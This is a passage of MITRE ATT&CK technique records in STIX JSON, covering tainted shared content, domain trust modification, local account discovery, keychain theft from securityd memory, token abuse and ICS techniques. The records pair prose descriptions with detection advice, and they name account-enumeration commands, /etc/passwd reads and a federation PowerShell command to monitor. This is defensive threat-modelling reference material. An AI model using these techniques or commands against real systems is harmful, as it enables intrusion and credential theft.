[Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Compromise Hardware Supply Chain](https://attack.mitre.org/techniques/T1195/003) or [Hardware Additions](https://attack.mitre.org/techniques/T1200)).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "reconnaissance"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Internet scanners may be used to look for patterns associated with malicious content designed to collect host hardware information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)\n\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--24286c33-d4a4-4419-85c2-1d094a896c26", "created": "2020-10-02T16:40:47.488Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1592/001", "external_id": "T1592.001"}, {"source_name": "ATT ScanBox", "description": "Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework Used with Watering Hole Attacks. Retrieved October 19, 2020.", "url": "https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks"}, {"source_name": "ThreatConnect Infrastructure Dec 2020", "description": "ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.", "url": "https://threatconnect.com/blog/infrastructure-research-hunting/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-05-31T12:33:20.915Z", "name": "Taint Shared Content", "description": "\nAdversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.\n\nA directory share pivot is a variation on this technique that uses several other techniques to propagate malware when users access a shared network directory. It uses [Shortcut Modification](https://attack.mitre.org/techniques/T1547/009) of directory .LNK files that use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like the real directories, which are hidden through [Hidden Files and Directories](https://attack.mitre.org/techniques/T1564/001). The malicious .LNK-based directories have an embedded command that executes the hidden malware file in the directory and then opens the real intended directory so that the user's expected action still occurs. When used with frequently used network directories, the technique may result in frequent reinfections and broad access to systems and potentially to new and higher privileged accounts. (Citation: Retwin Directory Share Pivot)\n\nAdversaries may also compromise shared network directories through binary infections by appending or prepending its code to the healthy binary on the shared network directory. The malware may modify the original entry point (OEP) of the healthy binary to ensure that it is executed before the legitimate code. The infection could continue to spread via the newly infected file when it is executed by a remote system. These infections may target both binary and non-binary formats that end with extensions including, but not limited to, .EXE, .DLL, .SCR, .BAT, and/or .VBS.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "lateral-movement"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Michal Dida, ESET", "David Routin"], "x_mitre_deprecated": false, "x_mitre_detection": "Processes that write or overwrite many files to a network shared directory may be suspicious. Monitor processes that are executed from removable media for malicious or abnormal activity such as network connections due to Command and Control and possible network Discovery techniques.\n\nFrequently scan shared network directories for malicious files, hidden files, .LNK files, and other file types that may not typical exist in directories used to share specific types of content.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Office 365", "SaaS", "Linux", "macOS"], "x_mitre_version": "1.4", "x_mitre_data_sources": [], "x_mitre_system_requirements": ["Access to shared folders and content with write permissions"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--246fd3c7-f5e3-466d-8787-4c13d9e3b61c", "created": "2017-05-31T21:31:01.759Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1080", "external_id": "T1080"}, {"source_name": "Retwin Directory Share Pivot", "description": "Routin, D. (2017, November 13). Abusing network shares for efficient lateral movements and privesc (DirSharePivot). Retrieved April 12, 2018.", "url": "https://rewtin.blogspot.ch/2017/11/abusing-user-shares-for-efficient.html"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-04-19T04:27:51.388Z", "name": "Trust Modification", "description": "Adversaries may add new domain trusts, modify the properties of existing domain trusts, or otherwise change the configuration of trust relationships between domains and tenants to evade defenses and/or elevate privileges.Trust details, such as whether or not user identities are federated, allow authentication and authorization properties to apply between domains or tenants for the purpose of accessing shared resources.(Citation: Microsoft - Azure AD Federation) These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains.\n\nManipulating these trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, in Microsoft Active Directory (AD) environments, this may be used to forge [SAML Tokens](https://attack.mitre.org/techniques/T1606/002) without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate. An adversary may also convert an AD domain to a federated domain using Active Directory Federation Services (AD FS), which may enable malicious trust modifications such as altering the claim issuance rules to log in any valid set of credentials as a specified user.(Citation: AADInternals zure AD Federated Domain) \n\nAn adversary may also add a new federated identity provider to an identity tenant such as Okta, which may enable the adversary to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation 2023)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Blake Strom, Microsoft 365 Defender", "Praetorian", "Obsidian Security"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor for modifications to domain trust settings, such as when a user or application modifies the federation settings on the domain or updates domain authentication from Managed to Federated via ActionTypes Set federation settings on domain and Set domain authentication.(Citation: Microsoft - Azure Sentinel ADFSDomainTrustMods) This may also include monitoring for Event ID 307 which can be correlated to relevant Event ID 510 with the same Instance ID for change details.(Citation: Sygnia Golden SAML)(Citation: CISA SolarWinds Cloud Detection)\n\nMonitor for PowerShell commands such as: Update-MSOLFederatedDomain \u2013DomainName: \"Federated Domain Name\", or Update-MSOLFederatedDomain \u2013DomainName: \"Federated Domain Name\" \u2013supportmultipledomain.(Citation: Microsoft - Update or Repair Federated domain)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Azure AD", "SaaS"], "x_mitre_version": "2.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--24769ab5-14bd-4f4e-a752-cfb185da53ee", "created": "2020-12-28T21:59:02.181Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1484/002", "external_id": "T1484.002"}, {"source_name": "CISA SolarWinds Cloud Detection", "description": "CISA. (2021, January 8). Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments. Retrieved January 8, 2021.", "url": "https://us-cert.cisa.gov/ncas/alerts/aa21-008a"}, {"source_name": "AADInternals zure AD Federated Domain", "description": "Dr. Nestori Syynimaa. (2017, November 16). Security vulnerability in Azure AD & Office 365 identity federation. Retrieved September 28, 2022.", "url": "https://o365blog.com/post/federation-vulnerability/"}, {"source_name": "Microsoft - Azure AD Federation", "description": "Microsoft. (2018, November 28). What is federation with Azure AD?. Retrieved December 30, 2020.", "url": "https://docs.microsoft.com/en-us/azure/active-directory/hybrid/whatis-fed"}, {"source_name": "Microsoft - Azure Sentinel ADFSDomainTrustMods", "description": "Microsoft. (2020, December). Azure Sentinel Detections. Retrieved December 30, 2020.", "url": "https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AuditLogs/ADFSDomainTrustMods.yaml"}, {"source_name": "Microsoft - Update or Repair Federated domain", "description": "Microsoft. (2020, September 14). Update or repair the settings of a federated domain in Office 365, Azure, or Intune. Retrieved December 30, 2020.", "url": "https://docs.microsoft.com/en-us/office365/troubleshoot/active-directory/update-federated-domain-office-365"}, {"source_name": "Okta Cross-Tenant Impersonation 2023", "description": "Okta Defensive Cyber Operations. (2023, August 31). Cross-Tenant Impersonation: Prevention and Detection. Retrieved February 15, 2024.", "url": "https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection"}, {"source_name": "Sygnia Golden SAML", "description": "Sygnia. (2020, December). Detection and Hunting of Golden SAML Attack. Retrieved January 6, 2021.", "url": "https://www.sygnia.co/golden-saml-advisory"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-13T17:57:00.378Z", "name": "Command-Line Interface", "description": "Adversaries may utilize command-line interfaces (CLIs) to interact with systems and execute commands. CLIs provide a means of interacting with computer systems and are a common feature across many types of platforms and devices within control systems environments. (Citation: Enterprise ATT&CK January 2018) Adversaries may also use CLIs to install and run new software, including malicious tools that may be installed over the course of an operation.\n\nCLIs are typically accessed locally, but can also be exposed via services, such as SSH, Telnet, and RDP. Commands that are executed in the CLI execute with the current permissions level of the process running the terminal emulator, unless the command specifies a change in permissions context. Many controllers have CLI interfaces for management purposes.", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "execution"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.1", "x_mitre_data_sources": ["Command: Command Execution", "Application Log: Application Log Content", "Process: Process Creation"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--24a9253e-8948-4c98-b751-8e2aee53127c", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0807", "external_id": "T0807"}, {"source_name": "Enterprise ATT&CK January 2018", "description": "Enterprise ATT&CK 2018, January 11 Command-Line Interface Retrieved. 2018/05/17 ", "url": "https://attack.mitre.org/wiki/Technique/T1059"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-12-26T20:58:19.356Z", "name": "Symmetric Cryptography", "description": "Adversaries may employ a known symmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Symmetric encryption algorithms use the same key for plaintext encryption and ciphertext decryption. Common symmetric encryption algorithms include AES, DES, 3DES, Blowfish, and RC4.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "command-and-control"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_deprecated": false, "x_mitre_detection": "With symmetric encryption, it may be possible to obtain the algorithm and key from samples and use them to decode network traffic to detect malware communications signatures.\n\nIn general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "Windows", "macOS", "Network"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--24bfaeba-cb0d-4525-b3dc-507c77ecec41", "created": "2020-03-16T15:45:17.032Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1573/001", "external_id": "T1573.001"}, {"source_name": "University of Birmingham C2", "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2024-01-11T23:47:44.655Z", "name": "Local Account", "description": "Adversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.\n\nCommands such as net user and net localgroup of the [Net](https://attack.mitre.org/software/S0039) utility and id and groups on macOS and Linux can list local users and groups.(Citation: Mandiant APT1)(Citation: id man page)(Citation: groups man page) On Linux, local users can also be enumerated through the use of the /etc/passwd file. On macOS the dscl . list /Users command can be used to enumerate local accounts.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "discovery"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Daniel Stepanic, Elastic", "Miriam Wiesner, @miriamxyra, Microsoft Security"], "x_mitre_deprecated": false, "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nMonitor for processes that can be used to enumerate user accounts, such as net.exe and net1.exe, especially when executed in quick succession.(Citation: Elastic - Koadiac Detection with EQL)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.4", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--25659dd6-ea12-45c4-97e6-381e3e4b593e", "created": "2020-02-21T21:07:55.393Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1087/001", "external_id": "T1087.001"}, {"source_name": "id man page", "description": "MacKenzie, D. and Robbins, A. (n.d.). id(1) - Linux man page. Retrieved January 11, 2024.", "url": "https://linux.die.net/man/1/id"}, {"source_name": "groups man page", "description": "MacKenzie, D. and Youngman, J. (n.d.). groups(1) - Linux man page. Retrieved January 11, 2024.", "url": "https://linux.die.net/man/1/groups"}, {"source_name": "Mandiant APT1", "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.", "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf"}, {"source_name": "Elastic - Koadiac Detection with EQL", "description": "Stepanic, D.. (2020, January 13). Embracing offensive tooling: Building detections against Koadic using EQL. Retrieved November 30, 2020.", "url": "https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-13T17:57:00.575Z", "name": "Point & Tag Identification", "description": "Adversaries may collect point and tag values to gain a more comprehensive understanding of the process environment. Points may be values such as inputs, memory locations, outputs or other process specific variables. (Citation: Dennis L. Sloatman September 2016) Tags are the identifiers given to points for operator convenience. \n\nCollecting such tags provides valuable context to environmental points and enables an adversary to map inputs, outputs, and other values to their control processes. Understanding the points being collected may inform an adversary on which processes and values to keep track of over the course of an operation.", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "collection"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Jos Wetzels - Midnight Blue"], "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.1", "x_mitre_data_sources": ["Network Traffic: Network Traffic Content", "Application Log: Application Log Content"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--25852363-5968-4673-b81d-341d5ed90bd1", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0861", "external_id": "T0861"}, {"source_name": "Dennis L. Sloatman September 2016", "description": "Dennis L. Sloatman 2016, September 16 Understanding PLC Programming Methods and the Tag Database System Retrieved. 2017/12/19 ", "url": "https://www.radioworld.com/industry/understanding-plc-programming-methods-and-the-tag-database-system"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-13T17:57:00.768Z", "name": "Device Restart/Shutdown", "description": "Adversaries may forcibly restart or shutdown a device in an ICS environment to disrupt and potentially negatively impact physical processes. Methods of device restart and shutdown exist in some devices as built-in, standard functionalities. These functionalities can be executed using interactive device web interfaces, CLIs, and network protocol commands.\n\nUnexpected restart or shutdown of control system devices may prevent expected response functions happening during critical states.\n\nA device restart can also be a sign of malicious device modifications, as many updates require a shutdown in order to take effect.", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "inhibit-response-function"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.1", "x_mitre_data_sources": ["Network Traffic: Network Traffic Flow", "Application Log: Application Log Content", "Operational Databases: Device Alarm", "Network Traffic: Network Traffic Content"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0816", "external_id": "T0816"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Securityd Memory", "description": "In OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple\u2019s keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords. (Citation: OS X Keychain) (Citation: External to DA, the OS X Way) Apple\u2019s securityd utility takes the user\u2019s logon password, encrypts it with PBKDF2, and stores this master key in memory. Apple also uses a set of keys and algorithms to encrypt the user\u2019s password, but once the master key is found, an attacker need only iterate over the other values to unlock the final password. (Citation: OS X Keychain)\n\nIf an adversary can obtain root access (allowing them to read securityd\u2019s memory), then they can scan through memory to find the correct sequence of keys in relatively few tries to decrypt the user\u2019s logon keychain. This provides the adversary with all the plaintext passwords for users, WiFi, mail, browsers, certificates, secure notes, etc. (Citation: OS X Keychain) (Citation: OSX Keydnap malware)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS"], "x_mitre_version": "1.0", "x_mitre_permissions_required": ["root"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--2715c335-1bf2-4efe-9f18-0691317ff83b", "created": "2017-12-14T16:46:06.044Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1167", "external_id": "T1167"}, {"source_name": "OS X Keychain", "description": "Juuso Salonen. (2012, September 5). Breaking into the OS X keychain. Retrieved July 15, 2017.", "url": "http://juusosalonen.com/post/30923743427/breaking-into-the-os-x-keychain"}, {"source_name": "External to DA, the OS X Way", "description": "Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to DA, the OS X Way. Retrieved July 3, 2017.", "url": "http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way"}, {"source_name": "OSX Keydnap malware", "description": "Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware is hungry for credentials. Retrieved July 3, 2017.", "url": "https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2023-10-13T17:57:00.969Z", "name": "User Execution", "description": "Adversaries may rely on a targeted organizations user interaction for the execution of malicious code. User interaction may consist of installing applications, opening email attachments, or granting higher permissions to documents. \n\nAdversaries may embed malicious code or visual basic code into files such as Microsoft Word and Excel documents or software installers. (Citation: Booz Allen Hamilton) Execution of this code requires that the user enable scripting or write access within the document. Embedded code may not always be noticeable to the user especially in cases of trojanized software. (Citation: Daavid Hentunen, Antti Tikkanen June 2014) \n\nA Chinese spearphishing campaign running from December 9, 2011 through February 29, 2012 delivered malware through spearphishing attachments which required user action to achieve execution. (Citation: CISA AA21-201A Pipeline Intrusion July 2021)", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "execution"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.1", "x_mitre_data_sources": ["Command: Command Execution", "Application Log: Application Log Content", "Network Traffic: Network Connection Creation", "File: File Access", "Process: Process Creation", "Network Traffic: Network Traffic Content"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0863", "external_id": "T0863"}, {"source_name": "Booz Allen Hamilton", "description": "Booz Allen Hamilton When The Lights Went Out Retrieved. 2019/10/22 ", "url": "https://www.boozallen.com/content/dam/boozallen/documents/2016/09/ukraine-report-when-the-lights-went-out.pdf"}, {"source_name": "Daavid Hentunen, Antti Tikkanen June 2014", "description": "Daavid Hentunen, Antti Tikkanen 2014, June 23 Havex Hunts For ICS/SCADA Systems Retrieved. 2019/04/01 ", "url": "https://www.f-secure.com/weblog/archives/00002718.html"}, {"source_name": "CISA AA21-201A Pipeline Intrusion July 2021", "description": "Department of Justice (DOJ), DHS Cybersecurity & Infrastructure Security Agency (CISA) 2021, July 20 Chinese Gas Pipeline Intrusion Campaign, 2011 to 2013 Retrieved. 2021/10/08 ", "url": "https://us-cert.cisa.gov/sites/default/files/publications/AA21-201A_Chinese_Gas_Pipeline_Intrusion_Campaign_2011_to_2013%20(1).pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Social Media Accounts", "description": "Adversaries may compromise social media accounts that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating social media profiles (i.e. [Social Media Accounts](https://attack.mitre.org/techniques/T1585/001)), adversaries may compromise existing social media accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. \n\nA variety of methods exist for compromising social media accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising social media accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.\n\nPersonas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Compromised social media accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos.\n\nAdversaries can use a compromised social media profile to create new, or hijack existing, connections to targets of interest. These connections may be direct or may include trying to connect through others.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) Compromised profiles may be leveraged during other phases of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "resource-development"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently modified accounts making numerous connection requests to accounts affiliated with your organization.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--274770e0-2612-4ccf-a678-ef8e7bad365d", "created": "2020-10-01T01:18:35.535Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1586/001", "external_id": "T1586.001"}, {"source_name": "AnonHBGary", "description": "Bright, P. (2011, February 15). Anonymous speaks: the inside story of the HBGary hack. Retrieved March 9, 2017.", "url": "https://arstechnica.com/tech-policy/2011/02/anonymous-speaks-the-inside-story-of-the-hbgary-hack/"}, {"source_name": "NEWSCASTER2014", "description": "Lennon, M. (2014, May 29). Iranian Hackers Targeted US Officials in Elaborate Social Media Attack Operation. Retrieved March 1, 2017.", "url": "https://www.securityweek.com/iranian-hackers-targeted-us-officials-elaborate-social-media-attack-operation"}, {"source_name": "BlackHatRobinSage", "description": "Ryan, T. (2010). \u201cGetting In Bed with Robin Sage.\u201d. Retrieved March 6, 2017.", "url": "http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-11-02T15:39:10.534Z", "name": "Application Access Token", "description": "Adversaries may use application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users and used in lieu of login credentials.\n\nApplication access tokens are used to make authorized API requests on behalf of a user and are commonly used as a way to access resources in cloud-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework that issues tokens to users for access to systems. These frameworks are used collaboratively to verify the user and determine what actions the user is allowed to perform. Once identity is established, the token allows actions to be authorized, without passing the actual credentials of the user. Therefore, compromise of the token can grant the adversary access to resources of other sites through a malicious application.(Citation: okta)\n\nFor example, with a cloud-based email service once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a \"refresh\" token enabling background access is awarded.(Citation: Microsoft Identity Platform Access 2019) With an OAuth access token an adversary can use the user-granted REST API to perform functions such as email searching and contact enumeration.(Citation: Staaldraad Phishing with OAuth 2017)\n\nCompromised access tokens may be used as an initial step in compromising other services. For example, if a token grants access to a victim\u2019s primary email, the adversary may be able to extend access to all other services which the target subscribes by triggering forgotten password routines. Direct API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords. Access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow.\n", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "lateral-movement"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Mark Wee", "Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services)", "Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)", "Shailesh Tiwary (Indian Army)", "Jack Burns, HubSpot"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor access token activity for abnormal use and permissions granted to unusual or suspicious applications. Administrators can set up a variety of logs and leverage audit tools to monitor actions that can be conducted as a result of OAuth 2.0 access. For instance, audit reports enable admins to identify privilege escalation actions such as role creations or policy modifications, which could be actions performed after initial access.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": 